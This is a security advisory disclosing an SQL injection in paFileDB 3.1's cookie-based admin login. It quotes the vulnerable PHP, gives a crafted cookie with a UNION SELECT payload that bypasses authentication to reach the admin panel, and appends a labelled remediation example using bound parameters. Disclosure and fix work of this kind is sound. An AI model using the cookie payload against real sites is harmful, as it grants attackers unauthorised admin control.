[SePro Advisory #5] PaFileDB 3.1 - SQL-Injection
===========================================================
Vendor: PhpArena
URL: http://www.phparena.net/
Date: 17.08.05
App.: PaFileDB
Version: 3.1
Type: SQL-Injection
Risk: High
Credits:
================================
Newangels & security-project.org Team
Vulnerability discovered by deluxe89
Writeup by Astovidatu
Description:
================================
paFileDB is designed to allow webmasters to have a database of files for download on their site.
See [1] for a detailed description.
SQL-Injection:
================================
The vulnerable file: '/includes/admin/auth.php'
Pre-conditions:
- magic_quotes_gpc Off
- $authmethod = cookies
Vulnerable Code:
[code]
if ($authmethod == "cookies") {
    echo "authmethod = cookies\n";
    // Cookie layout: md5(ip)|user|pass, all three fields are client-supplied
    $cdata = explode("|", $pafiledbcookie);
    $ip = $cdata[0];
    $user = $cdata[1];
    $pass = $cdata[2];
    echo "ip = $ip, user = $user, pass = $pass\n";
}
if (!empty($user)) {
    echo "user not empty\n";
    // $user is placed into the query string without escaping
    $admin = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_admin WHERE admin_username = '$user'", 1);
    $adminip = getenv ("REMOTE_ADDR");
    $md5ip = md5($adminip);
    if ($pass == $admin[admin_password] && $md5ip == $ip) {
        $logged = 1;
    }
} else {
    echo "user empty\n";
    $logged = 0;
}
[/code]
SQL-Injection through $user.
In order to exploit the issue, an attacker needs to construct a malformed cookie:
Name: pafiledbcookie
Content: [MD5 IP]%7CaG'+union+select+1,2,'pass',4,5/*%7Cpass
Then open "/pafiledb.php?action=admin": you're logged in as admin in the ACP.
Solution:
================================
There is no solution yet.
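
One way to close the injection in the cookie check, shown as an added example that is not paFileDB code or a vendor patch: the username is allow-listed and bound as a query parameter, and the comparisons are constant-time. The function name check_admin_cookie, the three-column pafiledb_admin table, the demo secret and the use of PDO with SQLite (pdo_sqlite enabled, PHP 7.1+) are assumptions made for the demonstration.

```php
<?php
// Added example, not paFileDB code. Table layout and names are assumptions.

/**
 * Validate the "md5(ip)|user|pass" cookie described in the advisory.
 * Returns true only when the stored value and the client IP hash both match.
 */
function check_admin_cookie(PDO $pdo, string $cookie, string $remoteAddr): bool
{
    $parts = explode('|', $cookie);
    if (count($parts) !== 3) {
        return false;                 // wrong shape: reject before touching the DB
    }
    [$ipHash, $user, $pass] = $parts;

    // Allow-list the username so quotes and SQL metacharacters are rejected early.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $user)) {
        return false;
    }

    // Bound parameter: $user travels as data and is never spliced into the SQL text.
    $stmt = $pdo->prepare(
        'SELECT admin_password FROM pafiledb_admin WHERE admin_username = ?'
    );
    $stmt->execute([$user]);
    $stored = $stmt->fetchColumn();
    if (!is_string($stored)) {
        return false;                 // no such admin row
    }

    // Constant-time comparison of both cookie fields.
    return hash_equals($stored, $pass) && hash_equals(md5($remoteAddr), $ipHash);
}

// Constructed demo data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pafiledb_admin (admin_id INTEGER, admin_username TEXT, admin_password TEXT)');
$secret = md5('constructed-demo-secret');
$pdo->prepare('INSERT INTO pafiledb_admin VALUES (1, ?, ?)')->execute(['admin', $secret]);

$ip   = '192.0.2.10';                                           // documentation address
$good = md5($ip) . '|admin|' . $secret;                         // legitimate cookie
$bad  = md5($ip) . "|aG' union select 1,2,'pass',4,5/*|pass";   // advisory cookie, URL-decoded

var_dump(check_admin_cookie($pdo, $good, $ip));
var_dump(check_admin_cookie($pdo, $bad, $ip));
```

The bound parameter alone is enough to defeat the cookie from the advisory; the allow-list is a second layer that rejects it before any query runs.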
[1] http://www.phparena.net/scripts.php?script=pafiledb